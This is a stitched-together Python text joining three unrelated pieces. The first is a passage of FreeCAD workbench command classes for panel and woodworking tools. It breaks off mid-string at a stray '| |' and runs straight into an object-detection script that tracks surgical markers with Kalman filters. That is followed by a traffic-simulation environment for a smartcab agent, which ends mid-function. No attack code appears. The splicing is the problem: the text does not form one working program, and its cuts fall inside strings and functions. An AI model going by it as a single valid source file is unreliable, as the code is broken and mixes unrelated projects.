if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("getDimensions", getDimensions())
# ######################################################################################################################
class sheet2export():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "sheet2export.xpm"),
"Accel" : "",
"MenuText": "sheet2export",
"ToolTip" : "Exports spreadsheet to chosen file format."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "sheet2export"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("sheet2export", sheet2export())
# ######################################################################################################################
class scanObjects():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "scanObjects.xpm"),
"Accel" : "",
"MenuText": "scanObjects",
"ToolTip" : "Inspection tool for FreeCAD macro development & project debug (live API)."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "scanObjects"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("scanObjects", scanObjects())
# ######################################################################################################################
class setTextures():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "setTextures.xpm"),
"Accel" : "",
"MenuText": "setTextures",
"ToolTip" : "Store textures information at object's property and allows to load textures from stored URL. Solves problem with texture sharing, no huge project file size."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "setTextures"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("setTextures", setTextures())
# ######################################################################################################################
class debugInfo():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "debugInfo.xpm"),
"Accel" : "",
"MenuText": "debugInfo",
"ToolTip" : "Copy platform details to clipboard for bug report purposes."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "debugInfo"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("debugInfo", debugInfo())
# ######################################################################################################################
class makeTransparent():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "makeTransparent.xpm"),
"Accel" : "",
"MenuText": "transparent or normal mode",
"ToolTip" : "Make all parts transparent, so you can see all the joints, pilot holes, screws, countersinks. If you click next one all parts will back to normal. The transparent default is 83, so do not set any part to this number if you want e.g. to keep glass part of the furniture transparent after this preview."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "makeTransparent"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("makeTransparent", makeTransparent())
# ######################################################################################################################
class colorManager():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "colorManager.xpm"),
"Accel" : "",
"MenuText": "colorManager",
"ToolTip" : "Allows to set face colors for all objects from spreadsheet. Also you can browse colors for manually selected face, object or many faces or objects and see the effect at 3D model in real-time."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "colorManager"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("colorManager", colorManager())
# ######################################################################################################################
class fitModel():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "fitModel.xpm"),
"Accel" : "",
"MenuText": "fitModel",
"ToolTip" : "Fit 3D model to the screen and set base orientation (XY, 0 key)."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "fitModel"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("fitModel", fitModel())
# ######################################################################################################################
class magicManager():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "magicManager.xpm"),
"Accel" : "",
"MenuText": "magicManager",
"ToolTip" : "If you have problem with unexpected result of Magic Panels, you can use this tool to preview panel before creation. It may take more time to create panel, but you can select exact panel to apply, also the edge and vertex position. This tool allows to create panel at selected face or between two faces."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "magicManager"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("magicManager", magicManager())
# ######################################################################################################################
class panelDefaultXY():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultXY.xpm"),
"Accel" : "",
"MenuText": "panel, XY, 600x300, 18 thickness",
"ToolTip" : "Create default panel with dimensions 600 mm x 300 mm and 18 mm thickness in the XY direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultXY"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultXY", panelDefaultXY())
# ######################################################################################################################
class panelDefaultYX():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultYX.xpm"),
"Accel" : "",
"MenuText": "panel, YX, 300x600, 18 thickness",
"ToolTip" : "Create default panel with dimensions 300 mm x 600 mm and 18 mm thickness in the YX direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultYX"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultYX", panelDefaultYX())
# ######################################################################################################################
class panelDefaultXZ():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultXZ.xpm"),
"Accel" : "",
"MenuText": "panel, XZ, 600x300, 18 thickness",
"ToolTip" : "Create default panel with dimensions 600 mm x 300 mm and 18 mm thickness in the XZ direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultXZ"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultXZ", panelDefaultXZ())
# ######################################################################################################################
class panelDefaultZX():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultZX.xpm"),
"Accel" : "",
"MenuText": "panel, ZX, 300x600, 18 thickness",
"ToolTip" : "Create default panel with dimensions 300 mm x 600 mm and 18 mm thickness in the ZX direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultZX"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultZX", panelDefaultZX())
# ######################################################################################################################
class panelDefaultYZ():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultYZ.xpm"),
"Accel" : "",
"MenuText": "panel, YZ, 600x300, 18 thickness",
"ToolTip" : "Create default panel with dimensions 600 mm x 300 mm and 18 mm thickness in the YZ direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultYZ"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultYZ", panelDefaultYZ())
# ######################################################################################################################
class panelDefaultZY():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultZY.xpm"),
"Accel" : "",
"MenuText": "panel, ZY, 300x600, 18 thickness",
"ToolTip" : "Create default panel with dimensions 300 mm x 600 mm and 18 mm thickness in the ZY direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultZY"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultZY", panelDefaultZY())
# ######################################################################################################################
class panelCopyXY():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelCopyXY.xpm"),
"Accel" : "",
"MenuText": "copy panel to XY",
"ToolTip" : "Copy selected panel to XY direction, described by the icon. If you select any supported panel in other direction, e.g. XZ, this will be some kind of copy panel with exact rotation. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelCopyXY"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelCopyXY", panelCopyXY())
# ######################################################################################################################
class panelCopyYX():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelCopyYX.xpm"),
"Accel" : "",
"MenuText": "copy panel to YX",
"ToolTip" : "Copy selected panel to YX direction, described by the icon. If you select any supported panel in other direction, e.g. XZ, this will be some kind of copy panel with exact rotation. Change dimensions and | |
# Source repository: makquel/object_detection_BGE
# Object detection using a CNN-based classifier, version 1.0
#
# -----------------------------------
# Author: <NAME>
# Date: 10/04/19
# Description: This script uses a classifier trained in TensorFlow to detect ASARP-type markers,
# useful for detecting muscular movement during the Pena surgery. Because the raw detections are
# unstable, the classifier is paired with a probabilistic estimator based on a Kalman filter.
# Import packages
import os
import cv2
import numpy as np
import tensorflow as tf
import sys
import time
import math
from scipy import linalg
# This is needed since the notebook is stored in the object_detection folder.
sys.path.append("..")
# Import utilites
from utils import label_map_util
from utils import visualization_utils as vis_util
import csv
# Name of the directory containing the object detection module we're using
MODEL_NAME = 'inference_graph'
# VIDEO_NAME = 'test.mov'
VIDEO_NAME = 'bge_teste.avi'
# Grab path to current working directory
CWD_PATH = os.getcwd()
# Path to frozen detection graph .pb file, which contains the model that is used
# for object detection.
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,'frozen_inference_graph.pb')
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,'training','label_map.pbtxt')
# Path to video
PATH_TO_VIDEO = os.path.join(CWD_PATH,VIDEO_NAME)
# Number of classes the object detector can identify
NUM_CLASSES = 6
# Load the label map.
# Label maps map indices to category names, so that when our convolution
# network predicts `5`, we know that this corresponds to `king`.
# Here we use internal utility functions, but anything that returns a
# dictionary mapping integers to appropriate string labels would be fine
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load the Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
# Define input and output tensors (i.e. data) for the object detection classifier
# Input tensor is the image
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Output tensors are the detection boxes, scores, and classes
# Each box represents a part of the image where a particular object was detected
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represents level of confidence for each of the objects.
# The score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
# Number of objects detected
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Open video file
video = cv2.VideoCapture(PATH_TO_VIDEO)
# https://stackoverflow.com/questions/37695376/python-and-opencv-getting-the-duration-time-of-a-video-at-certain-points
length = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
fps = video.get(cv2.CAP_PROP_FPS)
# KF sampling rate
# T = 1./fps
T = 1
print ("[INFO] Video rate: {:2f} fps".format(fps))
print ("[INFO] Video length: {} frames".format(length))
# get vcap property
# width = video.get(cv2.CV_CAP_PROP_FRAME_WIDTH) # float
# height = video.get(cv2.CV_CAP_PROP_FRAME_HEIGHT) # float
# https://www.rapidtables.com/web/color/RGB_Color.html
colors = dict({
"red": (0, 0, 255),
"green": (0, 255, 0),
"blue": (255, 0, 0),
"black":(0, 0, 0),
"white":(255, 255, 255),
"yellow":(255, 255, 0),
"cyan":(0, 255, 255),
"magenta":(255, 0, 255),
"silver":(192, 192, 192),
"gray":(128, 128, 128),
"maroon":(128, 0, 0),
"olive":(128, 128, 0),
"purple":(255, 0, 255),
"teal":(0, 128, 128),
"navy":(0, 0, 128)})
color_key = []
for key in colors:
color_key.append(key)
"""
State update matrices
"""
F = np.matrix( ((1, 0, T, 0),(0, 1, 0, T),(0, 0, 1, 0),(0, 0, 0, 1)) )
G = np.matrix( ((T**2/2),(T**2/2), T, T)).transpose()
H = np.matrix( ((1,0,0,0),(0,1,0,0)) ) # measurement function applied to the state estimate X_hat to get the expected next/new measurement
u = .005 #define acceleration magnitude
"""
Covariance matrices
"""
Sigma_v = .05; #process noise: the variability in how fast the ASARP_marker is speeding up (stdv of acceleration: meters/sec^2)
tkn_x = 1; #measurement noise in the horizontal direction (x axis).
tkn_y = 1; #measurement noise in the vertical direction (y axis).
Ez = np.matrix(((tkn_x,0),(0,tkn_y)))*.5**2
Ex = np.matrix( ((T**4/4,0,T**3/2,0),(0,T**4/4,0,T**3/2),(T**3/2,0,T**2,0),(0,T**3/2,0,T**2)) )*Sigma_v**2# Ex convert the process noise (stdv) into covariance matrix
P = [Ex]*14; # estimate of initial position variance (covariance matrix)
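# The matrices above define a constant-velocity Kalman filter over the state
# [x, y, vx, vy]: F advances the position by the velocity over one step T, G maps
# the scalar acceleration u into the state, H extracts the measured (x, y), Ex is
# the process-noise covariance, and Ez the measurement-noise covariance. A minimal
# sketch of one predict/update cycle with these matrices (the helper name `kf_step`
# is hypothetical; the per-marker loop below inlines exactly these steps):
def kf_step(x_hat, P, z, F, G, H, u, Ex, Ez):
    # predict: propagate the state and covariance one time step forward
    x_hat = F * x_hat + G * u
    P = F * P * F.T + Ex
    # update: blend the prediction with the measurement z = [x, y]^T
    K = P * H.T * linalg.inv(H * P * H.T + Ez)  # Kalman gain
    x_hat = x_hat + K * (z - H * x_hat)
    P = (np.identity(4) - K * H) * P
    return x_hat, P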
bboxes_i = []
bboxes_i_1 = []
# https://stackoverflow.com/questions/10617045/how-to-create-a-fix-size-list-in-python
# bboxes_swap = [xmin, ymin, xmax, ymax]
bboxes_swap = [[0.0 , 0.0, 0.0, 0.0]]*14
bboxes_hat = [np.matrix( (0., 0., 0., 0.) ).transpose()]*14
K = [[0.]]*14
swap_flag = [False]*14
frame_cnt = 0
'''
Files for debugging the KF
'''
outfile = open('./ANN_0.csv','w')
writer=csv.writer(outfile)
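# The loop below re-associates detections across frames by comparing bounding-box
# centers: for each box from the previous frame it looks for a current box whose
# center lies within a small pixel radius, and the matched centers are fed to the
# per-marker Kalman filters. A small helper equivalent to the repeated center
# computation inside the loop (the name `bbox_center` is hypothetical, shown only
# for clarity; boxes are [ymin, xmin, ymax, xmax] in normalized coordinates):
def bbox_center(box, width, height):
    ymin, xmin = box[0] * height, box[1] * width
    ymax, xmax = box[2] * height, box[3] * width
    return int(xmin + (xmax - xmin) / 2), int(ymin + (ymax - ymin) / 2)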
while(video.isOpened()):
# Acquire frame and expand frame dimensions to have shape: [1, None, None, 3]
# i.e. a single-column array, where each item in the column has the pixel RGB value
ret, frame = video.read()
width = int(video.get(3))
height = int(video.get(4))
frame_expanded = np.expand_dims(frame, axis=0)
start = time.time()
# Perform the actual detection by running the model with the image as input
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: frame_expanded})
end = time.time()
## https://stackoverflow.com/questions/26938799/printing-variables-in-python-3-4
print ("[INFO] Object detection took {:.2f} ms" .format((end-start)*1000))
# cv2.putText(frame, "Ts: {}ms".format((end-start)*1000),(10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (0, 255, 0), 2)
# Draw the results of the detection (aka 'visualize the results')
# vis_util.visualize_boxes_and_labels_on_image_array(
# frame,
# np.squeeze(boxes),
# np.squeeze(classes).astype(np.int32),
# np.squeeze(scores),
# category_index,
# use_normalized_coordinates=True,
# line_thickness=2,
# min_score_thresh=0.35)
bboxes_i = []
# print(len(boxes[0][:]))
for i in range(len(boxes[0][:])):
if scores[0][i] > 0.5: #uncertainty
bboxes_i.append(boxes[0][i])
# print("[DEBUG] Index counter:{}".format(i))
M = len(bboxes_i[:])
print("[DEBUG] M vector size: {}".format(M))
if (M >= 15):
print("[WARNING] M vector size is greater that the original setpoints number")
min_flag = None # not necessary
# bboxes_swap = []
Euc_min = 0
if (frame_cnt > 0):
## HELP: comparison between bboxes(k-1) and bboxes(k)
for m in range(len(bboxes_i_1[:])):
ymin_p = bboxes_i_1[m][0]*height
xmin_p = bboxes_i_1[m][1]*width
ymax_p = bboxes_i_1[m][2]*height
xmax_p = bboxes_i_1[m][3]*width
x_avg_p = int(xmin_p + (xmax_p-xmin_p)/2)
y_avg_p = int(ymin_p + (ymax_p-ymin_p)/2)
# rad_avg_p = math.sqrt(((xmax_p-xmin_p)/2)**2 + ((ymax_p-ymin_p)/2)**2)
## ind_cnt = 0
# print("[DEBUG] Vector size:{}".format(len(bboxes_i[:])))
for n in range(len(bboxes_i[:])):
ymin_q = bboxes_i[n][0]*height
xmin_q = bboxes_i[n][1]*width
ymax_q = bboxes_i[n][2]*height
xmax_q = bboxes_i[n][3]*width
x_avg_q = int(xmin_q + (xmax_q-xmin_q)/2)
y_avg_q = int(ymin_q + (ymax_q-ymin_q)/2)
# rad_avg_q = math.sqrt(((xmax_q-xmin_q)/2)**2 + ((ymax_q-ymin_q)/2)**2)
d_euc = math.sqrt(((x_avg_q-x_avg_p))**2 + ((y_avg_q-y_avg_p))**2)
# print("[DEBUG] Euc_distance: {:.2f}".format(d_euc))
# record the index with the smallest distance
if(d_euc < 7.0):
min_index = n
min_flag = True
Euc_min = d_euc
# print("[DEBUG] Index counter:{}".format(n))
# if min_flag:
if (min_flag and (swap_flag[min_index]==False)):
# if (min_index==1):
# # Predict next state of the asarp_marker with the last state and predicted motion.
# x_hat = F*x_hat + G*u;
# # predic_state = [predic_state; x_hat(1)] ;
# # predict next covariance
# P = F*P*F.T + Ex;
# # predic_var = [predic_var; P] ;
# # predicted measurement covariance
# # Kalman Gain
# K = P*H.T*linalg.inv(H*P*H.T + Ez);
# # Update the state estimate
# z = np.matrix( (x_avg_q, y_avg_q) ).transpose()
# writer.writerow([x_avg_q,y_avg_q])
# x_hat = x_hat + K*(z - H*x_hat);
# print("predicted state for bboxes[0]: {}" .format(x_hat))
# # update covariance estimation.
# P = (np.identity(4) - K*H)*P;
# insert into the bboxes_swap list at position [m] (keeping the original position)
# bboxes_swap.append(bboxes_i[min_index])
swap_flag[min_index] = True
bboxes_swap[m] = bboxes_i[min_index]
print("[DEBUG] Euc_distance: {:.2f}".format(Euc_min))
print("[DEBUG] Index: {}".format(min_index))
print("------------------------------------------------------------")
min_flag = False
# print("[DEBUG] Euclidean distance: {:.2f}".format(d_euc))
for swp_i in range(len(swap_flag[:])):
swap_flag[swp_i] = False
else:
# on iteration i=0, bboxes_swap can be a copy of bboxes_i, i.e. bboxes_i_1
ymin_dot = bboxes_i[5][0]*height
xmin_dot = bboxes_i[5][1]*width
ymax_dot = bboxes_i[5][2]*height
xmax_dot = bboxes_i[5][3]*width
x_dot_avg = int(xmin_dot + (xmax_dot-xmin_dot)/2)
y_dot_avg = int(ymin_dot + (ymax_dot-ymin_dot)/2)
x_hat = np.matrix( (x_dot_avg, y_dot_avg, 0, 0) ).transpose()
# bboxes_swap = bboxes_i
for idx in range(len(bboxes_i[:])):
ymin_dot = bboxes_i[idx][0]*height
xmin_dot = bboxes_i[idx][1]*width
ymax_dot = bboxes_i[idx][2]*height
xmax_dot = bboxes_i[idx][3]*width
x_dot_avg = int(xmin_dot + (xmax_dot-xmin_dot)/2)
y_dot_avg = int(ymin_dot + (ymax_dot-ymin_dot)/2)
print("index_cnt: {}".format(idx))
bboxes_swap[idx] = bboxes_i[idx]
#initial value for estimation scheme
bboxes_hat[idx][0] = x_dot_avg
bboxes_hat[idx][1] = y_dot_avg
if (frame_cnt > 0):
for k in range(len(bboxes_swap[:])):
ymin_k = bboxes_swap[k][0]*height
xmin_k = bboxes_swap[k][1]*width
ymax_k = bboxes_swap[k][2]*height
xmax_k = bboxes_swap[k][3]*width
x_avg_k = int(xmin_k + (xmax_k-xmin_k)/2)
y_avg_k = int(ymin_k + (ymax_k-ymin_k)/2)
# Predict next state of the asarp_marker with the last state and predicted motion.
# x_hat = F*x_hat + G*u;
bboxes_hat[k] = F*bboxes_hat[k] + G*u;
# predic_state = [predic_state; x_hat(1)] ;
# predict next covariance
# P = F*P*F.T + Ex;
P[k] = F*P[k]*F.T + Ex;
# predic_var = [predic_var; P] ;
# predicted measurement covariance
# <NAME>
# K = P*H.T*linalg.inv(H*P*H.T + Ez);
K[k] = P[k]*H.T*linalg.inv(H*P[k]*H.T + Ez);
# Update the state estimate
z = np.matrix( (x_avg_k, y_avg_k) ).transpose()
writer.writerow([x_avg_k,y_avg_k])
# x_hat = x_hat + K*(z - H*x_hat);
bboxes_hat[k] = bboxes_hat[k] + K[k]*(z - H*bboxes_hat[k]);
print("[DEBUG] predicted state for bboxes[0]: {}" .format(x_hat))
# update covariance estimation.
P[k] = (np.identity(4) - K[k]*H)*P[k];
# print("Swap vector size: {} ".format(len(bboxes_swap[:])))
frame_cnt = frame_cnt + 1
import time
import random
import math
from collections import OrderedDict
from simulator import Simulator
class TrafficLight(object):
"""A traffic light that switches periodically."""
valid_states = [True, False] # True = NS open; False = EW open
def __init__(self, state=None, period=None):
self.state = state if state is not None else random.choice(self.valid_states)
self.period = period if period is not None else random.choice([2, 3, 4, 5])
self.last_updated = 0
def reset(self):
self.last_updated = 0
def update(self, t):
if t - self.last_updated >= self.period:
self.state = not self.state # Assuming state is boolean
self.last_updated = t
class Environment(object):
"""Environment within which all agents operate."""
valid_actions = [None, 'forward', 'left', 'right']
valid_inputs = {'light': TrafficLight.valid_states, 'oncoming': valid_actions, 'left': valid_actions, 'right': valid_actions}
valid_headings = [(1, 0), (0, -1), (-1, 0), (0, 1)] # E, N, W, S
hard_time_limit = -100 # Set a hard time limit even if deadline is not enforced.
def __init__(self, verbose=False, num_dummies=100, grid_size = (8, 6)):
self.num_dummies = num_dummies # Number of dummy driver agents in the environment
self.verbose = verbose # If debug output should be given
# Initialize simulation variables
self.done = False
self.t = 0
self.agent_states = OrderedDict()
self.step_data = {}
self.success = None
# Road network
self.grid_size = grid_size # (columns, rows)
self.bounds = (1, 2, self.grid_size[0], self.grid_size[1] + 1)
self.block_size = 100
self.hang = 0.6
self.intersections = OrderedDict()
self.roads = []
for x in xrange(self.bounds[0], self.bounds[2] + 1):
for y in xrange(self.bounds[1], self.bounds[3] + 1):
self.intersections[(x, y)] = TrafficLight() # A traffic light at each intersection
for a in self.intersections:
for b in self.intersections:
if a == b:
continue
if (abs(a[0] - b[0]) + abs(a[1] - b[1])) == 1: # L1 distance = 1
self.roads.append((a, b))
# Add environment boundaries
for x in xrange(self.bounds[0], self.bounds[2] + 1):
self.roads.append(((x, self.bounds[1] - self.hang), (x, self.bounds[1])))
self.roads.append(((x, self.bounds[3] + self.hang), (x, self.bounds[3])))
for y in xrange(self.bounds[1], self.bounds[3] + 1):
self.roads.append(((self.bounds[0] - self.hang, y), (self.bounds[0], y)))
self.roads.append(((self.bounds[2] + self.hang, y), (self.bounds[2], y)))
# Create dummy agents
for i in xrange(self.num_dummies):
self.create_agent(DummyAgent)
# Primary agent and associated parameters
self.primary_agent = None # to be set explicitly
self.enforce_deadline = False
# Trial data (updated at the end of each trial)
self.trial_data = {
'testing': False, # if the trial is for testing a learned policy
'initial_distance': 0, # L1 distance from start to destination
'initial_deadline': 0, # given deadline (time steps) to start with
'net_reward': 0.0, # total reward earned in current trial
'final_deadline': None, # deadline value (time remaining) at the end
'actions': {0: 0, 1: 0, 2: 0, 3: 0, 4: 0}, # violations and accidents
'success': 0 # whether the agent reached the destination in time
}
def create_agent(self, agent_class, *args, **kwargs):
""" When called, create_agent creates an agent in the environment. """
agent = agent_class(self, *args, **kwargs)
self.agent_states[agent] = {'location': random.choice(self.intersections.keys()), 'heading': (0, 1)}
return agent
def set_primary_agent(self, agent, enforce_deadline=False):
""" When called, set_primary_agent sets 'agent' as the primary agent.
The primary agent is the smartcab that is followed in the environment. """
self.primary_agent = agent
agent.primary_agent = True
self.enforce_deadline = enforce_deadline
def reset(self, testing=False):
""" This function is called at the beginning of a new trial. """
self.done = False
self.t = 0
# Reset status text
self.step_data = {}
# Reset traffic lights
for traffic_light in self.intersections.itervalues():
traffic_light.reset()
# Pick a start and a destination
start = random.choice(self.intersections.keys())
destination = random.choice(self.intersections.keys())
# Ensure starting location and destination are not too close
while self.compute_dist(start, destination) < 4:
start = random.choice(self.intersections.keys())
destination = random.choice(self.intersections.keys())
start_heading = random.choice(self.valid_headings)
distance = self.compute_dist(start, destination)
deadline = distance * 5 # 5 time steps per intersection away
if(self.verbose == True): # Debugging
print "Environment.reset(): Trial set up with start = {}, destination = {}, deadline = {}".format(start, destination, deadline)
# Create a map of all possible initial positions
positions = dict()
for location in self.intersections:
positions[location] = list()
for heading in self.valid_headings:
positions[location].append(heading)
# Initialize agent(s)
for agent in self.agent_states.iterkeys():
if agent is self.primary_agent:
self.agent_states[agent] = {
'location': start,
'heading': start_heading,
'destination': destination,
'deadline': deadline
}
# For dummy agents, make them choose one of the available
# intersections and headings still in 'positions'
else:
intersection = random.choice(positions.keys())
heading = random.choice(positions[intersection])
self.agent_states[agent] = {
'location': intersection,
'heading': heading,
'destination': None,
'deadline': None
}
# Now delete the taken location and heading from 'positions'
positions[intersection] = list(set(positions[intersection]) - set([heading]))
if positions[intersection] == list(): # No headings available for intersection
del positions[intersection] # Delete the intersection altogether
agent.reset(destination=(destination if agent is self.primary_agent else None), testing=testing)
if agent is self.primary_agent:
# Reset metrics for this trial (step data will be set during the step)
self.trial_data['testing'] = testing
self.trial_data['initial_deadline'] = deadline
self.trial_data['final_deadline'] = deadline
self.trial_data['net_reward'] = 0.0
self.trial_data['actions'] = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0}
self.trial_data['parameters'] = {'e': agent.epsilon, 'a': agent.alpha}
self.trial_data['success'] = 0
def step(self):
""" This function is called when a time step is taken turing a trial. """
# Pretty print to terminal
print ""
print "/-------------------"
print "| Step {} Results".format(self.t)
print "\-------------------"
print ""
if(self.verbose == True): # Debugging
print "Environment.step(): t = {}".format(self.t)
# Update agents, primary first
if self.primary_agent is not None:
self.primary_agent.update()
for agent in self.agent_states.iterkeys():
if agent is not self.primary_agent:
agent.update()
# Update traffic lights
for intersection, traffic_light in self.intersections.iteritems():
traffic_light.update(self.t)
if self.primary_agent is not None:
# Agent has taken an action: reduce the deadline by 1
agent_deadline = self.agent_states[self.primary_agent]['deadline'] - 1
self.agent_states[self.primary_agent]['deadline'] = agent_deadline
if agent_deadline <= self.hard_time_limit:
self.done = True
self.success = False
if self.verbose: # Debugging
print "Environment.step(): Primary agent hit hard time limit ({})! Trial aborted.".format(self.hard_time_limit)
elif self.enforce_deadline and agent_deadline <= 0:
self.done = True
self.success = False
if self.verbose: # Debugging
